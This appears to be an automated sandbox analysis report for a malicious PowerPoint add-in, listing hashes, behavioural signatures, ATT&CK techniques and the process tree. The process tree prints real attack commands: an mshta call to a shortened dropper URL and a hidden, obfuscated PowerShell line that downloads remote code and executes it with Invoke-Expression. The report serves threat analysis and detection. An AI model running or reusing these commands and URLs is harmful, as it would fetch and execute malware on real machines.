Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    25-01-2022 21:28

General

  • Target

    2bae03ea91a0d39390de51793348ed98404f5fe3bb11f8f340151657a1a3f669.ppam

  • Size

    9KB

  • MD5

    05fe4d5d400cc4d2a51542351f8c960c

  • SHA1

    87d158c376769994cf98402edb9f3b7f0739f8c5

  • SHA256

    2bae03ea91a0d39390de51793348ed98404f5fe3bb11f8f340151657a1a3f669

  • SHA512

    94374d60e2bbc096cb47472960d1bf205dd86789dbc892e6268135302e74c3b95bcda7bb21b5d84548b90cc1f9fe5cef21d9de6f0ec80681aa53c6d523f5973f

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://www.j.mp/ahsdiahwidaiuwd

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\2bae03ea91a0d39390de51793348ed98404f5fe3bb11f8f340151657a1a3f669.ppam"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1204
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:660
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://www.j.mp/ahsdiahwidaiuwd
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:684
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h (New-Object IO.StreamReader([Net.HttpWebRequest]::Create('https://www.mediafire.com/file/nga4gqkunvlk0dj/main.dll/file').GetResponse().GetResponseStream())).ReadToEnd()|I'e'x
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1744

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    2
    T1112

    Install Root Certificate

    1
    T1130

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/660-57-0x000007FEFC261000-0x000007FEFC263000-memory.dmp
      Filesize

      8KB

    • memory/1204-54-0x00000000749A1000-0x00000000749A5000-memory.dmp
      Filesize

      16KB

    • memory/1204-55-0x0000000071A51000-0x0000000071A53000-memory.dmp
      Filesize

      8KB

    • memory/1204-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1204-58-0x0000000075CE1000-0x0000000075CE3000-memory.dmp
      Filesize

      8KB

    • memory/1744-68-0x0000000002210000-0x00000000024E0000-memory.dmp
      Filesize

      2.8MB

    • memory/1744-69-0x0000000002210000-0x00000000024E0000-memory.dmp
      Filesize

      2.8MB